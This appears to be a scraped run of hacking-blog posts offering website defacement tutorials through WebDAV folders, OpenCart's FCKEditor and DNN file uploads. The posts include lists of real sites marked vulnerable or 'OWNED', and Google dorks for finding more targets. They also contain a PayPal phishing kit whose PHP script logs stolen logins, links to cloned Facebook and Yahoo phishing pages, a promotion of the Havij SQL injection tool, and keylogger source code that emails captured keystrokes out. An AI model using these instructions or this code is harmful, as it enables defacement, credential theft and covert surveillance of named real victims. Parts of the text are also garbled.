If you have successfully opened the web folder and right-click and select New - Web FolderWebFolders allow you to drag/drop, cut-n-paste files between your PC and your IBackup account, and direct editing of supported office files including Word, Excel and PowerPoint directly from within Internet Explorer or from your Desktop. A WebFolder is a shortcut to a remote Internet folder like your IBackup account. WebFolders is a convenient way to store and retrieve files between your computer and your IBackup account from Windows Explorer and Internet Explorer. It is highly recommended for corporate environments due to its firewall friendliness and full 128 bit SSL support. WebFolders allow you to treat your IBackup account pretty much like a regular folder on Windows Explorer.

Windows XP :

1. On Desktop, Right Click & Choose 'New Shortcut'

2. There will be a popup box asking to enter the destination location, then you enter the address below:

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

3. If you have successfully opened the web folder and right-click and select New - Web Folder
4. Then a popup will appear asking to enter destination addresses. For example, you enter www.zjgsxy.com
5. Copy and paste an html file to the web folder to the folder you made
6. If the copy and paste is complete, for example if your file name is "test.html" the way to see is to open a browser and type in the address : www.zjgsxy.com/test.html

Windows Vista :

1. Open 'Computer' & Click on “Map network drive” in the horizontal menu.
2. Click on “Connect to a Web site that you can use to store your documents and pictures”.

3. Click on “Choose a custom network location”.

4. Enter the URL , Example : www.zjgsxy.com

5. Enter to the www.zjgsxy.com folder & Copy your Defacement page to www.zjgsxy.com.

Windows 7 :

1. In my 'Computer', Right click & Choose "Add a network location"
2. "Add Network Location Wizard" will appear click next.

3. When asked "Add Network Location Wizard", then select Custom Network then click "Next"
4. For the "Internet or network location" please put www.zjgsxy.com

5. When you see the "completing the Add Network Location Wizard". Tick "Open the network location When I click Finish" and finish ..

6.Copy your Defacement page to the Folder & Your Defacement address will be like this : www.zjgsxy.com/test.html.

Vuln Website List :

~~zgsfjw.net~~ [Patched]
centro.anje.pt
www.ziangli.com
6.shicheng.gov.cn
www.ville-mordelles.fr
www.podiocom.com
www.journeezerotracas.fr
~~www.journeezerotracas.com~~ [Patched]
www.journee0tracas.com
www.comune.torrice.fr.it
www.chinamaster88.com
www.chateaudelepinay.fr
www.centroformazioneitalia.it
www.bjautoobd.com
www.autodiagtool.com
usa.automotormaster.com
so-sighty.fr
perros-guirec.icor.fr
myhealthcity.com
~~malaysiahealthcareindonesia.com~~ [Patched]
lapetitehublais.fr
handistar.fr
gz.autoobd-ii.com
gz.automotormaster.com
expert-comptable-35.fr
carrelages-palmieri.com
camion-road-show.com
autoobd.cn
hibis.co.id
www.zjgsxy.com

If you need the Dork. Here it is :

inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js.cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp
inurl:.zj.cn/*.asp
inurl:.ac.cn/*.asp
inurl:.com.cn/*.asp
inurl:.edu.cn/*.asp
inurl:.gov.cn/*.asp
inurl:.net.cn/*.asp
inurl:.org.cn/*.asp

Fake Site (Phishing)

2011-11-21T17:17:00.000-08:00

Phishing is a way of attempting to acquire information such as usernames,passwords, and credit card details by masquerading as a trustworthy entity in anelectronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mailspoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing,[4] probably influenced by phreaking,[5] [6] and alludes to "baits" u

How to make Fake Site?
In this tutorial, we will use PayPal site to make a fake site :)

1. Open the PayPal site using Google Chrome or Mozilla FireFox.
2. Stay at Login Page & Save the Login Page (CTRL+P)
3. Copy this code & Save as login.php

<?php
header ('Location: http://paypal.com/ ');
$handle = fopen("data.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

4. Open Saved PayPal Site with Notepad. (The HTML).

5.Find this line & change it to your login.php Location

6. Upload your Fake site & Start Promote it :)

Example of Fake Site

Yahoo.com

Facebook.com

Mudah.my

Download Link :

yahoo.zip

mudah.zip

facebook.zip

Havij v1.15 (Advanced SQL Injection Tools)

2011-11-21T06:05:00.000-08:00

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij.
The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

What's New?

Webknight WAF bypass added.
Bypassing mod_security made better
Unicode support added
A new method for tables/columns extraction in mssql
Continuing previous tables/columns extraction made available
Custom replacement added to the settings
Default injection value added to the settings (when using %Inject_Here%)
Table and column prefix added for blind injections
Custom table and column list added.
Custom time out added.
A new md5 cracker site added
bugfix: a bug releating to SELECT command
bugfix: finding string column
bugfix: getting multi column data in mssql
bugfix: finding mysql column count
bugfix: wrong syntax in injection string type in MsAccess
bugfix: false positive results was removed
bugfix: data extraction in url-encoded pages
bugfix: loading saved projects
bugfix: some errors in data extraction in mssql fixed.
bugfix: a bug in MsAccess when guessing tables and columns
bugfix: a bug when using proxy
bugfix: enabling remote desktop bug in windows server 2008 (thanks to pegasus315)
bugfix: false positive in finding columns count
bugfix: when mssql error based method failed
bugfix: a bug in saving data
bugfix: Oracle and PostgreSQL detection

Link to Download:

Download

How to use:

This tool is for exploiting SQL Injection bugs in web application.

For using this tool you should know a little about SQL Injections.

Enter target url and select http method then click Analyze.

Note: Try to url be valid input that returns a normal page not a 404 or error page.

If you need password, go here

[TUT] Deface via OpenCart [TUT]

2011-11-21T05:47:00.000-08:00

Actually we using FCKEditor techniques to deface websites, and admin websites are not to CHMOD / Protect their directory .. So, with this interchangeable me access to their directory and use FCKEditor to deface and giving security warning on the webmaster-webmaster .. So, i will show ways to deface websites using the FCKEditor, Follow the step below ..

1) Create your deface file first, using the extension. Html,
example deface.html
2) Search on Google, use this dork: Powered by OpenCart.
You may also add carian for certain domains, like. Com.
Example: Powered by OpenCart site:. Com
3) Exploit BGI OpenCart: / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html.
web search for one by one that has not been patched, and enter the above exploit.
Example: www.site.com / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html,
Example 2: www.site.com / cms / admin / view / javascript / fckeditor / editor / filemanager / connectors / test.html
4) Replace the connector: ASP to PHP, select the file, then upload.
5) Ok, so deface korang file will be like this.
Example: www.site.com / deface.html,

Website List:

http://bestonlinediscounts.net/ [OWNED]
http://wenrestaurant.com/ [OWNED]
http://ruthsgarden.com/ [OWNED]
http://www.utahflowers.net/ [UNAVAILABLE]
http://www.inlove.my/ [UNAVAILABLE]
http://megamall.com.pk/ [UNAVAILABLE]
http://stefanyboutique.com/ [UNAVAILABLE]
http://www.virtualgeorge.info/ [UNAVAILABLE]
http://iphoneclone.biz/ [UNAVAILABLE]
http://amourcristallis.com/ [UNAVAILABLE]
http://www.eesnet.org/ [UNAVAILABLE]
http://www.schoolshopper.com.au/ [OWNED]
http://www.mymaxi.nl/ [UNAVAILABLE]
http://wiretek.net/ [OWNED]
http://shop.tjokgus.com/ [OWNED]
http://www.aquariumsystem.it/ [UNAVAILABLE]
http://uae-shopper.com/ [UNAVAILABLE]
http://organicjewelries.com/ [OWNED]
http://www.granmasantiques.com/ [OWNED]
http://avocadogenie.com/ [UNAVAILABLE]
http://www.inputandanalysis.com/ [OWNED]
http://eddiegifts.com/ [OWNED]

Hide KeyStroke, Trojan & Protect Files

2011-11-21T02:22:00.000-08:00

SoftwarePassport technology protects your Windows or Mac application and expands your global sales capabilities. You can globalize the marketing features of SoftwarePassport by customizing the language strings to any language. It contains powerful features such as flexible server-based licensing and activation, trialware distribution and marketing, in-application purchasing and sophisticated country based licensing to name just a few. Altogether, they enable software publishers like you to grow revenue by:

-Protecting your software from piracy
-Exposing your products to rapidly expanding global markets
-Maximizing the lifetime value of your buyers whether they are consumers, small to mid-size businesses or corporations
-Attracting new customers in lucrative and untapped markets

How to use :
-Click at the top 'New Projects' & New Windows will opened

-After that, click at 'certificates'

-After you have entered the certificates name, close the windows.
-Click at 'Files to Protect', Done with that?
-Close the 'New Project' windows.
-Click 'CTRL+P' & Your files have been successfully Protected.

Download Files :
SoftwarePassport Armadillo 5.6

[TUT] Deface via DNN [TUT]

2011-11-20T23:02:00.000-08:00

DotNetNuke is an open source web content management system based on Microsoft .NET technology.

DotNetNuke was written in VB.NET, though the developer has shifted to C# since version 6.0.[4] It is distributed under both a Community Edition BSD-style license [3] and commercial proprietary licenses as the Professional and Enterprise Editions. DotNetNuke is extensible and customizable through the use of skins, modules, data providers, language packs and templates.

All things we need is

-An ASP Shell

-PHPJackal OR C99 Shell

-Some nice Deface pages

We will use this Google Dork

inurl:fcklinkgallery.aspx

Now you will see lots of websites.
Pick anyone.

You will see something like this : Example 1

Click 'File' & Enter this code at address

javascript:__doPostBack('ctlURL$cmdUpload','')

Will appear Upload Button & Browse Button
Choose Shell & Start Uploading

Your shell will store at :

http://www.TARGETSITE.com/portals/0/shell name

Happy Defacing Website :)

Make Undetect Keylogger with Visual Basic 2008/2010

2011-11-20T22:19:00.000-08:00

Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck on a keyboard, typically in a covert manner so that the person using the keyboard is unaware that their actions are being monitored. There are numerous keylogging methods, ranging from hardware and software-based approaches to electromagnetic and acoustic analysis.

Example :

Imports System.Web
Imports System.IO
Imports System.Net.Mail
*******************************************
Public Class Form1
Dim result As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Declare Function GetAnyncKeySync Lib "user32" (ByVal vKey As Long) As Integer
*******************************************
Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
For i = 1 To 255
result = 0
result = GetAsyncKeyState(i)
If result = -32767 Then
TextBox1.Text = TextBox1.Text + Chr(i)
End If
Next i
End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
My.Computer.Clipboard.SetText("Haha")
End Sub

Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("uremail@gmail.com", "password")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
SmtpServer.EnableSsl = True
mail.To.Add("uremail@anymailserver.com")
mail.From = New MailAddress("nothere-mail@gmail.com")
mail.Subject = "password"
mail.Body = TextBox1.Text
SmtpServer.Send(mail)
End Sub

Remember, You must use Google Mail Service or your Keylogger will Detect by Victims.